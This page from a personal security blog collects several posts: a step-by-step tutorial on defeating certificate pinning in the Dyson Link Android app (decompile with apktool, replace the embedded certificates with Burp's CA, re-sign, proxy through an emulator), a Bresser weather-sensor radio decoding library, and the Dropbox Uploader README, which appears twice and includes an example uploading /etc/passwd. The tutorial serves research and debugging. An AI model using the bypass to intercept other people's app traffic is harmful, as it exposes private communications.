<p>Andrea Fabrizi’s security blog (https://www.andreafabrizi.it/)</p>
<h1 id="intercepting-android-apps-with-burp-suite">Intercepting Android apps with Burp Suite</h1>
<p>2017-03-16</p>
<h3 id="certificate-pinning">Certificate pinning</h3>
<p>What happens when an Android app connects to a remote HTTPS server?</p>
<p>By default, the app matches the certificate provided by the server against the device’s trust store and checks that the
certificate has been issued for the expected hostname. It performs no additional checks, and this of course
can be a security hole, as an unsafe certificate can be installed by mistake by the user or by malicious apps,
allowing man-in-the-middle attacks.</p>
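<p>As an aside, Python’s <code class="highlighter-rouge">ssl</code> module makes these two default checks, and only these, explicit:</p>

```python
import ssl

# A default TLS context performs exactly the two checks described above:
# chain validation against the system trust store and hostname matching.
context = ssl.create_default_context()
print(context.check_hostname)  # True: the hostname is verified
print(context.verify_mode)     # VerifyMode.CERT_REQUIRED: chain is validated
```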
<p>The solution adopted by developers is <strong>certificate pinning</strong>, which consists in embedding a specific certificate in the app
and forcing the app to use it, matching the one used by the server while ignoring the device’s trust store, thus allowing
the mobile application to successfully connect only to the legitimate server.</p>
<p>This is a very good practice, but unfortunately it prevents debugging or reverse engineering the app using tools such as Burp Suite.</p>
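<p>The idea behind pinning can be sketched in a few lines of Python; the certificate bytes and the pinned fingerprint below are made-up stand-ins for illustration:</p>

```python
import hashlib

def matches_pin(der_cert: bytes, pinned_sha256_hex: str) -> bool:
    # Pinning: compare the served certificate's fingerprint against a value
    # shipped inside the app, instead of consulting the device trust store.
    return hashlib.sha256(der_cert).hexdigest() == pinned_sha256_hex

# Stand-in byte string instead of a real DER-encoded certificate:
cert = b"dummy certificate bytes"
pin = hashlib.sha256(cert).hexdigest()   # the value the app would embed
print(matches_pin(cert, pin))            # True: legitimate server
print(matches_pin(b"mitm cert", pin))    # False: interception attempt
```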
<h3 id="replace-the-embedded-certificate">Replace the embedded certificate</h3>
<p>For the demonstration I will use <a href="https://play.google.com/store/apps/details?id=com.dyson.mobile.android">Dyson Link</a>, an Android app from
<strong><em>Dyson</em></strong>, which I was interested in reverse engineering.</p>
<p>The app uses a series of embedded certificates to verify the authenticity of the remote API server. So let’s start by decompiling the app using
<a href="https://ibotpeaches.github.io/Apktool/">apktool</a>.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>andrea@system:~/demo$ java -jar apktool_2.2.2.jar d ./DysonLink_v3.3.1.apk
I: Using Apktool 2.2.2 on DysonLink_v3.3.1.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/andrea/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
</code></pre>
</div>
<p>The result will be the folder <strong><em>DysonLink_v3.3.1</em></strong> containing the decompiled code and the app resources. The folder <strong><em>DysonLink_v3.3.1/assets/</em></strong> contains
our SSL certificates.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>andrea@system:~/demo$ ls -l DysonLink_v3.3.1/assets/
total 120
-rw-rw-r-- 1 3189 Mar 16 16:46 DysonConnectedProductsCNServerAuthenticationIssuingCA.crt.bundle.pem
-rw-rw-r-- 1 3505 Mar 16 16:46 DysonMockServerAuthenticationIssuingCA.crt.cer
-rw-rw-r-- 1 3188 Mar 16 16:46 DysonProdEnvsConnectedProductsCNServerAuthenticationIssuingCA.crt.bundle.pem
-rw-rw-r-- 1 2518 Mar 16 16:46 DysonProdEnvsConnectedProductsServerAuthenticationIssuingCA.crt.bundle.pem
drwxrwxr-x 2 4096 Mar 16 16:46 fonts
drwxrwxr-x 2 4096 Mar 16 16:46 images
-rw-rw-r-- 1 andrea andrea 38457 Mar 16 16:46 register_configuration.json
-rw-rw-r-- 1 6543 Mar 16 16:46 timezones.json
</code></pre>
</div>
<p>Now let’s fire up Burp Suite and export the CA certificate, using the GUI or by pointing the browser to <strong><em>http://burp/</em></strong>. The certificate is in DER format, which we need
to convert to PEM.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>openssl x509 -inform der -in cacert.der -out cacert.pem
</code></pre>
</div>
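<p>If you prefer to stay in Python, the same DER-to-PEM conversion can be done with the <code class="highlighter-rouge">ssl</code> helpers; the byte string below is a stand-in for the real contents of <em>cacert.der</em>:</p>

```python
import ssl

# Equivalent of: openssl x509 -inform der -in cacert.der -out cacert.pem
# (with real data you would read the bytes from cacert.der instead).
der = b"stand-in DER certificate bytes"
pem = ssl.DER_cert_to_PEM_cert(der)      # base64-wraps into a PEM block
print(pem.startswith("-----BEGIN CERTIFICATE-----"))  # True
print(ssl.PEM_cert_to_DER_cert(pem) == der)           # True: lossless round trip
```

<p>With the real file you would pass the bytes read from <em>cacert.der</em> and write the resulting string to <em>cacert.pem</em>.</p>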
<p>We will use the newly generated certificate to replace all the <strong><em>pem</em></strong> files in the <strong><em>assets</em></strong> folder.</p>
<h3 id="repack-the-app">Repack the app</h3>
<p>Recreate the apk from the source folder:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>andrea@system:~/demo$ java -jar apktool_2.2.2.jar b -o DysonLink_new.apk DysonLink_v3.3.1
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: warning: string 'connection_connect_ap_app_to_robot_description_single' has no default translation.
W: warning: string 'connection_connect_ap_app_to_robot_title_single' has no default translation.
W: warning: string 'connection_journey_carousel_no_blue_light' has no default translation.
W: warning: string 'connection_journey_carousel_robot_blue_light_description' has no default translation.
W: warning: string 'connection_journey_carousel_robot_dock_description' has no default translation.
W: warning: string 'connection_journey_carousel_robot_title' has no default translation.
W: warning: string 'connection_journey_carousel_robot_wifi_light_description' has no default translation.
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
</code></pre>
</div>
<h3 id="sign-the-apk">Sign the apk</h3>
<p>Generate a new keystore for the signing procedure:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>keytool -genkey -keystore test.keystore -validity 10000 -alias test
</code></pre>
</div>
<p>Sign the forged apk:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>jarsigner -keystore test.keystore -verbose DysonLink_new.apk test
</code></pre>
</div>
<h3 id="test-it">Test it!</h3>
<p>Now we are ready to install it in our emulator. First, let’s start it with the proxy settings pointing to Burp Suite:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>./emulator -netdelay none -netspeed full -http-proxy http://127.0.0.1:8118 -avd Nexus_5_API_23
</code></pre>
</div>
<p>Install the forged apk (remember to uninstall the original one first):</p>
<div class="highlighter-rouge"><pre class="highlight"><code>adb install DysonLink_new.apk
</code></pre>
</div>
<p>And… as soon as we open the app, we will see the HTTPS traffic passing through Burp Suite!</p>
<h1 id="luxembourg-weather-stats">Luxembourg weather stats</h1>
<p>2016-09-28</p>
<p>Using the <a href="/2016/09/09/Bresser-Weather-Center/">Bresser library</a> I’ve developed, I started a little project to collect weather
information in the place where I live and graph real-time and historical data.</p>
<p>The statistics are available at <a href="https://airquality.andreafabrizi.it/">https://airquality.andreafabrizi.it/</a></p>
<p>The original project name was <strong>airquality</strong> because I was also collecting PM2.5 and PM10 samples (and calculating the relative AQI)
using the <a href="http://www.dylosproducts.com/dcproairqumo.html">Dylos DC1100 PRO</a> particle counter. For the moment it’s not running anymore,
because I have to find a better place to put it outside.</p>
<h1 id="bresser-weather-center">Bresser Weather Center</h1>
<p>2016-09-09</p>
<p>The <a href="http://www.bresser.de/en/Weather-Time/BRESSER-Weather-Center-5-in-1.html">BRESSER weather center 5-in-1</a> (model 7002510) outdoor sensor transfers all measured values for wind speed, wind direction, humidity, temperature and precipitation rate to the base station using radio signals and a proprietary protocol.</p>
<p>This library decodes the readings sent by the Bresser sensors. I tested it only with an RTL2838 dongle, using the rtl-sdr software (<a href="http://www.rtl-sdr.com/">http://www.rtl-sdr.com/</a>).</p>
<p>Note that I haven’t fully reversed the data packet sent by the sensor yet; the work is still ongoing and the library still needs a lot of testing.</p>
<h2 id="reversing-and-packet-structure">Reversing and packet structure</h2>
<p>The sensor transmits the packets on the 868.300 MHz frequency with AM modulation.</p>
<p>The following is a capture of the already demodulated wave:</p>
<p><img src="https://www.andreafabrizi.it/img/bresser_radio_signal.png" alt="Radio Signal" title="Radio wave" /></p>
<p>The packet is 264 bits long and the bits are encoded with 1 for high and 0 for low. The data should be read as nybbles (half bytes) in BCD format.</p>
<p>With the sampling rate set to 48 kHz we have an average of 6 samples per bit.</p>
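<p>A minimal sketch of this decoding step (the noise threshold and the sample values are illustrative, not the library’s actual code):</p>

```python
NOISE = 700            # illustrative amplitude threshold
SAMPLES_PER_BIT = 6    # ~6 samples per bit at 48 kHz

def samples_to_bits(samples):
    # Majority vote over each group of 6 demodulated samples:
    # mostly high -> 1, mostly low -> 0.
    bits = []
    for i in range(0, len(samples) - SAMPLES_PER_BIT + 1, SAMPLES_PER_BIT):
        group = samples[i:i + SAMPLES_PER_BIT]
        highs = sum(1 for s in group if s > NOISE)
        bits.append(1 if highs > SAMPLES_PER_BIT // 2 else 0)
    return bits

def bits_to_nibbles(bits):
    # Group the bit stream into 4-bit nybbles (the BCD digits).
    return [sum(b << (3 - j) for j, b in enumerate(bits[i:i + 4]))
            for i in range(0, len(bits) - 3, 4)]

# One high bit period followed by one low bit period:
print(samples_to_bits([900, 950, 910, 920, 400, 930, 100, 50, 80, 900, 60, 70]))
# prints [1, 0]
```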
<p>The following is the packet structure I’ve reversed so far; the parts that still need to be identified are not highlighted.</p>
<p><img src="https://www.andreafabrizi.it/img/bresser_packet.png" alt="Packet structure" /></p>
<p>The checksum is just an XOR of the following data.</p>
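<p>In Python the check is a one-liner over the decoded nybbles (the values below are made up for illustration):</p>

```python
from functools import reduce

def xor_checksum(nibbles):
    # XOR all data nybbles together; the result must match the
    # checksum nybble carried in the packet.
    return reduce(lambda a, b: a ^ b, nibbles, 0)

data = [0x5, 0x0, 0x2, 0x0, 0x7]  # made-up decoded nybbles
print(hex(xor_checksum(data)))    # 0x5 ^ 0x2 ^ 0x7 = 0x0
```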
<h2 id="get-the-code">Get the code</h2>
<p>Visit the project page on <a href="https://github.com/andreafabrizi/BresserWeatherCenter">GitHub</a> or get the code with the command:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/BresserWeatherCenter.git
</code></pre>
</div>
<h2 id="simple-usage">Simple usage</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>from bresser import *
#The noise value should be manually adjusted for the moment
b = Bresser(printdata=True, noise = 700)
b.process_radio_data()
</code></pre>
</div>
<div class="highlighter-rouge"><pre class="highlight"><code>rtl_fm -M am -f 868.300M -s 48k -g 49.6 | ./example.py
2016-09-09 19:59:07: Humidity: 50% Temperature: 20.7° Wind: 2.2 Km/h NNE Rain: 4.0 mm
2016-09-09 19:59:17: Humidity: 50% Temperature: 20.7° Wind: 2.2 Km/h NNE Rain: 4.0 mm
2016-09-09 19:59:30: Humidity: 49% Temperature: 20.6° Wind: 2.2 Km/h NNE Rain: 4.0 mm
</code></pre>
</div>
<h2 id="advanced-usage">Advanced usage</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>from bresser import *
def process_packet(p):
print "Humidity: %d%% " % p.getHumidity(),
print "Temperature: %.1f" % p.getTemperature() + u"\u00b0 ",
print "Wind: %.1f m/s %s" % (p.getWindSpeed(), p.getWindDirection()),
print "Rain: %.1f mm" % p.getRain(),
print ""
if __name__ == "__main__":
#Noise needs to be adjusted manually
b = Bresser(noise = 700)
b.set_callback(process_packet)
b.process_radio_data()
</code></pre>
</div>
<div class="highlighter-rouge"><pre class="highlight"><code>rtl_fm -M am -f 868.300M -s 48k -g 49.6 | ./example.py
Humidity: 91% Temperature: 6.4° Wind: 0.0 m/s E Rain: 78.8 mm
Humidity: 91% Temperature: 6.4° Wind: 0.0 m/s E Rain: 78.8 mm
Humidity: 91% Temperature: 6.5° Wind: 0.0 m/s E Rain: 78.8 mm
</code></pre>
</div>
<p>Note that most probably the gain and the frequency need to be adjusted, depending on your device and antenna.</p>
<h2 id="antenna">Antenna</h2>
<p>As an antenna I used a self-made metal wire 8.64 cm long (300000/868000/4), and it works quite well.</p>
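<p>The length is simply a quarter wavelength at the sensor’s frequency, using the same units as the formula above:</p>

```python
c = 300000.0        # speed of light in km/s
f = 868000.0        # frequency in kHz (rounded, as in the formula above)
quarter_wave_m = c / f / 4             # c/f in these units gives metres
print(round(quarter_wave_m * 100, 2))  # length in cm -> 8.64
```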
<h2 id="to-do">To do</h2>
<ul>
<li>Remove dependency from rtl_fm using pyrtlsdr</li>
<li>Implement an automatic noise detection</li>
</ul>
<h1 id="dropbox-uploader">Dropbox Uploader</h1>
<p>2016-01-01</p>
<p>Dropbox Uploader is a <strong>BASH</strong> script which can be used to upload, download, delete, list files (and more!) from <strong>Dropbox</strong>, an online file sharing, synchronization and backup service.</p>
<p>It’s written in BASH scripting language and only needs <strong>cURL</strong>.</p>
<p>You can take a look at the <a href="https://github.com/andreafabrizi/Dropbox-Uploader">GitHub project page</a>.</p>
<p><strong>Why use this script?</strong></p>
<ul>
<li><strong>Portable:</strong> It’s written in BASH scripting and only needs <code class="highlighter-rouge">cURL</code> (curl is a tool to transfer data from or to a server, available for all operating systems and installed by default in many linux distributions).</li>
<li><strong>Secure:</strong> It’s not required to provide your username/password to this script, because it uses the official Dropbox API v2 for the authentication process.</li>
</ul>
<p>Please refer to the <a href="https://github.com/andreafabrizi/Dropbox-Uploader/wiki">Wiki</a> for tips and additional information about this project. The Wiki is also the place where you can share your scripts and examples related to Dropbox Uploader.</p>
<h2 id="features">Features</h2>
<ul>
<li>Cross platform</li>
<li>Support for the official Dropbox API v2</li>
<li>No password required or stored</li>
<li>Simple step-by-step configuration wizard</li>
<li>Simple and chunked file upload</li>
<li>File and recursive directory download</li>
<li>File and recursive directory upload</li>
<li>Shell wildcard expansion (only for upload)</li>
<li>Delete/Move/Rename/Copy/List/Share files</li>
<li>Create share link</li>
<li>Monitor for changes</li>
</ul>
<h2 id="getting-started">Getting started</h2>
<p>First, clone the repository using git (recommended):</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/Dropbox-Uploader.git
</code></pre>
</div>
<p>or download the script manually using this command:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>curl <span class="s2">"https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh"</span> -o dropbox_uploader.sh
</code></pre>
</div>
<p>Then give the execution permission to the script and run it:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>chmod +x dropbox_uploader.sh
./dropbox_uploader.sh
</code></pre>
</div>
<p>The first time you run <code class="highlighter-rouge">dropbox_uploader</code>, you’ll be guided through a wizard in order to configure access to your Dropbox. This configuration will be stored in <code class="highlighter-rouge">~/.dropbox_uploader</code>.</p>
<h2 id="usage">Usage</h2>
<p>The syntax is quite simple:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>./dropbox_uploader.sh [PARAMETERS] COMMAND...
[%%]: Optional param
<%%>: Required param
</code></pre>
</div>
<p><strong>Available commands:</strong></p>
<ul>
<li>
<p><strong>upload</strong> <LOCAL_FILE/DIR …> <REMOTE_FILE/DIR><br />
Upload a local file or directory to a remote Dropbox folder.<br />
If the file is bigger than 150MB it is uploaded in small chunks (50MB by default);
in this case a . (dot) is printed for every chunk successfully uploaded and a * (star) if an error
occurs (the upload is retried a maximum of three times).
Only if the file is smaller than 150MB is the standard upload API used, and if the -p option is specified
the default curl progress bar is displayed during the upload process.<br />
The local file/dir parameter supports wildcards expansion.</p>
</li>
<li>
<p><strong>download</strong> <REMOTE_FILE/DIR> [LOCAL_FILE/DIR]<br />
Download file or directory from Dropbox to a local folder</p>
</li>
<li>
<p><strong>delete</strong> <REMOTE_FILE/DIR><br />
Remove a remote file or directory from Dropbox</p>
</li>
<li>
<p><strong>move</strong> <REMOTE_FILE/DIR> <REMOTE_FILE/DIR><br />
Move or rename a remote file or directory</p>
</li>
<li>
<p><strong>copy</strong> <REMOTE_FILE/DIR> <REMOTE_FILE/DIR><br />
Copy a remote file or directory</p>
</li>
<li>
<p><strong>mkdir</strong> <REMOTE_DIR><br />
Create a remote directory on Dropbox</p>
</li>
<li>
<p><strong>list</strong> [REMOTE_DIR]<br />
List the contents of the remote Dropbox folder</p>
</li>
<li>
<p><strong>monitor</strong> [REMOTE_DIR] [TIMEOUT]<br />
Monitor the remote Dropbox folder for changes. If a timeout is specified, the function returns at the first change event.</p>
</li>
<li>
<p><strong>share</strong> <REMOTE_FILE><br />
Get a public share link for the specified file or directory</p>
</li>
<li>
<p><strong>saveurl</strong> <URL> <REMOTE_DIR><br />
Download a file from a URL directly to a Dropbox folder (the file is NOT downloaded locally)</p>
</li>
<li>
<p><strong>search</strong> <QUERY><br />
Search for a specific pattern on Dropbox and return the list of matching files or directories</p>
</li>
<li>
<p><strong>info</strong><br />
Print some info about your Dropbox account</p>
</li>
<li>
<p><strong>space</strong>
Print some info about the space usage on your Dropbox account</p>
</li>
<li>
<p><strong>unlink</strong><br />
Unlink the script from your Dropbox account</p>
</li>
</ul>
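<p>The chunked-upload policy described for the <strong>upload</strong> command can be sketched as follows (a Python sketch, not the script’s actual BASH code; <code class="highlighter-rouge">send_chunk</code> is a hypothetical stand-in for the Dropbox API call):</p>

```python
# Files over the threshold are sent in fixed-size chunks, each retried up
# to three times; "." marks a chunk uploaded, "*" a failed attempt.
def upload(data, send_chunk, chunk=50 * 1024 * 1024,
           threshold=150 * 1024 * 1024, retries=3):
    if len(data) <= threshold:
        return send_chunk(data)              # standard single-request upload
    for start in range(0, len(data), chunk):
        for _attempt in range(retries):
            if send_chunk(data[start:start + chunk]):
                print(".", end="")           # chunk uploaded
                break
            print("*", end="")               # error, retry
        else:
            return False                     # chunk failed all retries
    print()
    return True
```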
<p><strong>Optional parameters:</strong></p>
<ul>
<li>
<p><strong>-f <FILENAME></strong><br />
Load the configuration file from a specific file</p>
</li>
<li>
<p><strong>-s</strong><br />
Skip already existing files when downloading/uploading. Default: Overwrite</p>
</li>
<li>
<p><strong>-d</strong><br />
Enable DEBUG mode</p>
</li>
<li>
<p><strong>-q</strong><br />
Quiet mode. Don’t show progress meter or messages</p>
</li>
<li>
<p><strong>-h</strong><br />
Show file sizes in human readable format</p>
</li>
<li>
<p><strong>-p</strong><br />
Show cURL progress meter</p>
</li>
<li>
<p><strong>-k</strong><br />
Don’t check SSL certificates (insecure)</p>
</li>
</ul>
<p><strong>Examples:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> ./dropbox_uploader.sh upload /etc/passwd /myfiles/passwd.old
./dropbox_uploader.sh upload <span class="k">*</span>.zip /
./dropbox_uploader.sh download /backup.zip
./dropbox_uploader.sh delete /backup.zip
./dropbox_uploader.sh mkdir /myDir/
./dropbox_uploader.sh upload <span class="s2">"My File.txt"</span> <span class="s2">"My File 2.txt"</span>
./dropbox_uploader.sh share <span class="s2">"My File.txt"</span>
./dropbox_uploader.sh list
</code></pre>
</div>
<h2 id="tested-environments">Tested Environments</h2>
<ul>
<li>GNU Linux</li>
<li>FreeBSD 8.3/10.0</li>
<li>MacOSX</li>
<li>Windows/Cygwin</li>
<li>Raspberry Pi</li>
<li>QNAP</li>
<li>iOS</li>
<li>OpenWRT</li>
<li>Chrome OS</li>
<li>OpenBSD</li>
</ul>
<p>If you have successfully tested this script on others systems or platforms please let me know!</p>
<h2 id="running-as-cron-job">Running as cron job</h2>
<p>Dropbox Uploader relies on a different configuration file for each system user. The default configuration file location is <code class="highlighter-rouge">$HOME/.dropbox_uploader</code>. This means that if you set up the script with your user and then try to run a cron job as root, it won’t work.
So, when running this script using cron, please keep in mind the following:</p>
<ul>
<li>Remember to set up the script as the user that runs the cron job</li>
<li>Always specify the full script path when running it (e.g. /path/to/dropbox_uploader.sh)</li>
<li>Always use the -f option to specify the full configuration file path, because sometimes in the cron environment the home folder path is not detected correctly (e.g. -f /home/youruser/.dropbox_uploader)</li>
<li>For security reasons, my advice is not to share the same configuration file between different users</li>
</ul>
<h2 id="how-to-setup-a-proxy">How to setup a proxy</h2>
<p>To use a proxy server, just set the <strong>https_proxy</strong> environment variable:</p>
<p><strong>Linux:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nb">export </span><span class="nv">HTTP_PROXY_USER</span><span class="o">=</span>XXXX
<span class="nb">export </span><span class="nv">HTTP_PROXY_PASSWORD</span><span class="o">=</span>YYYY
<span class="nb">export </span><span class="nv">https_proxy</span><span class="o">=</span>http://192.168.0.1:8080
</code></pre>
</div>
<p><strong>BSD:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> setenv HTTP_PROXY_USER XXXX
setenv HTTP_PROXY_PASSWORD YYYY
setenv https_proxy http://192.168.0.1:8080
</code></pre>
</div>
<h2 id="bash-and-curl-installation">BASH and Curl installation</h2>
<p><strong>Debian & Ubuntu Linux:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> sudo apt-get install bash <span class="o">(</span>Probably BASH is already installed on your system<span class="o">)</span>
sudo apt-get install curl
</code></pre>
</div>
<p><strong>BSD:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nb">cd</span> /usr/ports/shells/bash <span class="o">&&</span> make install clean
<span class="nb">cd</span> /usr/ports/ftp/curl <span class="o">&&</span> make install clean
</code></pre>
</div>
<p><strong>Cygwin:</strong><br />
You need to install these packages:</p>
<ul>
<li>curl</li>
<li>ca-certificates</li>
<li>dos2unix</li>
</ul>
<p>Before running the script, you need to convert it using the dos2unix command.</p>
<p><strong>Build cURL from source:</strong></p>
<ul>
<li>Download the source tarball from http://curl.haxx.se/download.html</li>
<li>Follow the INSTALL instructions</li>
</ul>
<h2 id="dropshell">DropShell</h2>
<p>DropShell is an interactive Dropbox shell, based on Dropbox Uploader:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>DropShell v0.2
The Intractive Dropbox SHELL
Andrea Fabrizi - andrea.fabrizi@gmail.com
Type <span class="nb">help </span><span class="k">for </span>the list of the available commands.
<span class="gp">andrea@Dropbox:/$ </span>ls
<span class="o">[</span>D] 0 Apps
<span class="o">[</span>D] 0 Camera Uploads
<span class="o">[</span>D] 0 Public
<span class="o">[</span>D] 0 scripts
<span class="o">[</span>D] 0 Security
<span class="o">[</span>F] 105843 notes.txt
<span class="gp">andrea@DropBox:/ServerBackup$ </span>get notes.txt
</code></pre>
</div>
<h2 id="running-as-docker-container">Running as Docker Container</h2>
<p>If you have docker installed on your system and don’t want to deal with downloading the script and ensuring the correct curl version etc., you can run Dropbox-Uploader via docker as well:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code><span class="gp">andrea@Dropbox:/$ </span>docker run -it --rm --user<span class="o">=</span><span class="k">$(</span>id -u<span class="k">)</span>:<span class="k">$(</span>id -g<span class="k">)</span> -v <LOCAL_CONFIG_PATH>:/config -v <YOUR_DATA_DIR_MOUNT> peez/dropbox-uploader <Arguments>
</code></pre>
</div>
<p>This will store the auth token information in the given local directory <code class="highlighter-rouge"><LOCAL_CONFIG_PATH></code>. To ensure access to your mounted directories, it can be important to pass a UID and GID to the docker daemon (as shown in the example by the --user argument).</p>
<p>Using the script with docker also makes it possible to run it even on Windows machines.</p>
<p>To use a proxy, just set the mentioned environment variables via the docker <code class="highlighter-rouge">-e</code> parameter.</p>
<h2 id="related-projects">Related projects</h2>
<p><a href="https://github.com/mDfRg/Thunar-Dropbox-Uploader-plugin/tree/thunar-dropbox/plugins/thunar">thunar-dropbox</a>: A simple extension to Dropbox Uploader that provides a convenient method to share your Dropbox files with one click!</p>
<h2 id="donations">Donations</h2>
<p>If you want to support this project, please consider donating:</p>
<ul>
<li>PayPal: https://www.paypal.me/AndreaFabrizi83</li>
<li>BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqG</li>
</ul>Andrea FabriziDropbox Uploader
Dropbox Uploader is a BASH script which can be used to upload, download, delete, list files (and more!) from Dropbox, an online file sharing, synchronization and backup service.
It’s written in BASH scripting language and only needs cURL.
You can take a look to the GiHub project page.
Why use this script?
Portable: It’s written in BASH scripting and only needs cURL (curl is a tool to transfer data from or to a server, available for all operating systems and installed by default in many linux distributions).
Secure: It’s not required to provide your username/password to this script, because it uses the official Dropbox API v2 for the authentication process.
Please refer to the Wiki for tips and additional information about this project. The Wiki is also the place where you can share your scripts and examples related to Dropbox Uploader.
Features
Cross platform
Support for the official Dropbox API v2
No password required or stored
Simple step-by-step configuration wizard
Simple and chunked file upload
File and recursive directory download
File and recursive directory upload
Shell wildcard expansion (only for upload)
Delete/Move/Rename/Copy/List/Share files
Create share link
Monitor for changes
Getting started
First, clone the repository using git (recommended):
git clone https://github.com/andreafabrizi/Dropbox-Uploader.git
or download the script manually using this command:
curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh
Then give the execution permission to the script and run it:
$chmod +x dropbox_uploader.sh
$./dropbox_uploader.sh
The first time you run dropbox_uploader, you’ll be guided through a wizard in order to configure access to your Dropbox. This configuration will be stored in ~/.dropbox_uploader.
Usage
The syntax is quite simple:
./dropbox_uploader.sh [PARAMETERS] COMMAND...
[%%]: Optional param
<%%>: Required param
Available commands:
upload <LOCAL_FILE/DIR …> <REMOTE_FILE/DIR>
Upload a local file or directory to a remote Dropbox folder.
If the file is bigger than 150Mb the file is uploaded using small chunks (default 50Mb);
in this case a . (dot) is printed for every chunk successfully uploaded and a * (star) if an error
occurs (the upload is retried for a maximum of three times).
Only if the file is smaller than 150Mb, the standard upload API is used, and if the -p option is specified
the default curl progress bar is displayed during the upload process.
The local file/dir parameter supports wildcards expansion.
download <REMOTE_FILE/DIR> [LOCAL_FILE/DIR]
Download file or directory from Dropbox to a local folder
delete <REMOTE_FILE/DIR>
Remove a remote file or directory from Dropbox
move <REMOTE_FILE/DIR> <REMOTE_FILE/DIR>
Move or rename a remote file or directory
copy <REMOTE_FILE/DIR> <REMOTE_FILE/DIR>
Copy a remote file or directory
mkdir <REMOTE_DIR>
Create a remote directory on Dropbox
list [REMOTE_DIR]
List the contents of the remote Dropbox folder
monitor [REMOTE_DIR] [TIMEOUT]
Monitor the remote Dropbox folder for changes. If timeout is specified, at the first change event the function will return.
share <REMOTE_FILE>
Get a public share link for the specified file or directory
saveurl <URL> <REMOTE_DIR>
Download a file from an URL to a Dropbox folder directly (the file is NOT downloaded locally)
search <QUERY>
Search for a specific pattern on Dropbox and returns the list of matching files or directories
info
Print some info about your Dropbox account
space
Print some info about the space usage on your Dropbox account
unlink
Unlink the script from your Dropbox account
Optional parameters:
-f <FILENAME>
Load the configuration file from a specific file
-s
Skip already existing files when download/upload. Default: Overwrite
-d
Enable DEBUG mode
-q
Quiet mode. Don’t show progress meter or messages
-h
Show file sizes in human readable format
-p
Show cURL progress meter
-k
Doesn’t check for SSL certificates (insecure)
Examples:
./dropbox_uploader.sh upload /etc/passwd /myfiles/passwd.old
./dropbox_uploader.sh upload *.zip /
./dropbox_uploader.sh download /backup.zip
./dropbox_uploader.sh delete /backup.zip
./dropbox_uploader.sh mkdir /myDir/
./dropbox_uploader.sh upload "My File.txt" "My File 2.txt"
./dropbox_uploader.sh share "My File.txt"
./dropbox_uploader.sh list
Tested Environments
GNU Linux
FreeBSD 8.3/10.0
MacOSX
Windows/Cygwin
Raspberry Pi
QNAP
iOS
OpenWRT
Chrome OS
OpenBSD
If you have successfully tested this script on others systems or platforms please let me know!
Running as cron job
Dropbox Uploader relies on a different configuration file for each system user. The default configuration file location is $HOME/.dropbox_uploader. This means that if you setup the script with your user and then you try to run a cron job as root, it won’t work.
So, when running this script using cron, please keep in mind the following:
Remember to setup the script with the user used to run the cron job
Always specify the full script path when running it (e.g. /path/to/dropbox_uploader.sh)
Use always the -f option to specify the full configuration file path, because sometimes in the cron environment the home folder path is not detected correctly (e.g. -f /home/youruser/.dropbox_uploader)
My advice is, for security reasons, to not share the same configuration file with different users
How to setup a proxy
To use a proxy server, just set the https_proxy environment variable:
Linux:
export HTTP_PROXY_USER=XXXX
export HTTP_PROXY_PASSWORD=YYYY
export https_proxy=http://192.168.0.1:8080
BSD:
setenv HTTP_PROXY_USER XXXX
setenv HTTP_PROXY_PASSWORD YYYY
setenv https_proxy http://192.168.0.1:8080
BASH and Curl installation
Debian & Ubuntu Linux:
sudo apt-get install bash (Probably BASH is already installed on your system)
sudo apt-get install curl
BSD:
cd /usr/ports/shells/bash && make install clean
cd /usr/ports/ftp/curl && make install clean
Cygwin:
You need to install these packages:
curl
ca-certificates
dos2unix
Before running the script, you need to convert it using the dos2unix command.
Build cURL from source:
Download the source tarball from http://curl.haxx.se/download.html
Follow the INSTALL instructions
DropShell
DropShell is an interactive DropBox shell, based on DropBox Uploader:
DropShell v0.2
The Intractive Dropbox SHELL
Andrea Fabrizi - andrea.fabrizi@gmail.com
Type help for the list of the available commands.
andrea@Dropbox:/$ ls
[D] 0 Apps
[D] 0 Camera Uploads
[D] 0 Public
[D] 0 scripts
[D] 0 Security
[F] 105843 notes.txt
andrea@DropBox:/ServerBackup$ get notes.txt
Running as Docker Container
If you have installed docker on your system and don’t want to deal with downloading the script and ensuring the correct curl versions etc., you can run Dropbox-Uploader via docker as well:
andrea@Dropbox:/$ docker run -it --rm --user=$(id -u):$(id -g) -v <LOCAL_CONFIG_PATH>:/config -v <YOUR_DATA_DIR_MOUNT> peez/dropbox-uploader <Arguments>
This will store the auth token information in the given local directory in <LOCAL_CONFIG_PATH>. To ensure access to your mounted directories, it can be important to pass a UID and GID to the docker daemon (as shown in the example with the --user argument)
